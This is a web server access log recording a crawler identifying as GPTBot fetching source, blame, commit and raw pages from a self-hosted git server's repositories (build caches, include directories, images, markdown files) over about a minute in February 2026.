"/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15187] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15368] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" -[17/Feb/2026:15:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13439] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" -[17/Feb/2026:15:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18918] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" -[17/Feb/2026:15:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18883] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:15:06:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.gitignore" -[17/Feb/2026:15:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.gitignore" -[17/Feb/2026:15:06:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.gitignore" -[17/Feb/2026:15:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.gitignore" -[17/Feb/2026:15:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18916] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" -[17/Feb/2026:15:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10675] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10167] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18878] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" -[17/Feb/2026:15:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10707] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10705] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10707] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25008] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20647] [Gzip 14.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25006] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10201] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10384] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 24978] [Gzip 12.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10407] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10404] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10407] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10178] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18916] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" -[17/Feb/2026:15:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -[17/Feb/2026:15:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:15:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:15:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:15:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10875] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:15:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:15:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:15:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10746] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:15:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" -[17/Feb/2026:15:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/.gitignore" [Client 74.7.227.38] [Length 12223] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:15:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25008] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10202] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692375] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429964] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508483] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498861] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641819] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699419] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 